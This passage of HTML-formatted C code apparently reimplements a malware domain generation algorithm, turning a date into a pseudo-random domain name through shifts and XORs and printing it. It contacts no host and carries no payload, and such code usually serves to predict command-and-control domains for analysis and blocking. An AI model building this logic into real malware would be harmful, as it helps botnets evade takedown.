<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">{</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day2 = day <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day3 = ~(day <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(day2 ></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day3 = day2;</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day1 = day3;</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: black;"><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="color: #008326; white-space: normal;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">// compute month</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> month1 = month ^ (month << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(month1 <= </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">7</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> {</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> month1 = month <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">((month << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) <= </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">7</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">month1 = ~(month << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: black;"><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="color: #008326; white-space: normal;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">// compute year</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year1 = year ^ (year <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">((year ^ (year << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) <= </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">15</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">{</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year2 = year << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">24</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year3 = ~year2;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(year2 ></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">15</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year3 = year2;</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year1 = year3;</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> size = (((</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* (month1 &</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0xF8</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^ ((month1 ^</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">4</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* month1) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">25</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^ ((day1 ^ (day1 <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">13</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">19</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) ^ ((year1 ^ (</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">8</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* year1)) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">11</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) &</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">3</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">13</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="color: #008326;"></span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">j = size</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> -</span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">domain = (</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">char</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">*)malloc(size);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> memset(domain,</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">, </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">size);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">for</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(i = </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">; i < j; i++)</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> {</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day1 = ((day1 ^ (day1 <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">13</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">19</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^ ((day1 & </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0xFFFFFFFE</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) << </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">12</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> month1 = ((month1 ^</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">4</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* month1) >> </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">25</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* (month1 &</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0xFFFFFFF8</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year1 = ((year1 ^</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">8</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> * year1) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">11</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^ ((year1 & </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0xFFFFFFF0</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">17</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> domain[i] = ((year1 ^ month1 ^ day1) % </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">25</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) +</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">97</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="white-space: normal;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">printf(</span></span><span style="color: #d62b24;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"Domain: %s \n"</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">, (</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">char</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">*)domain);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></span></div>
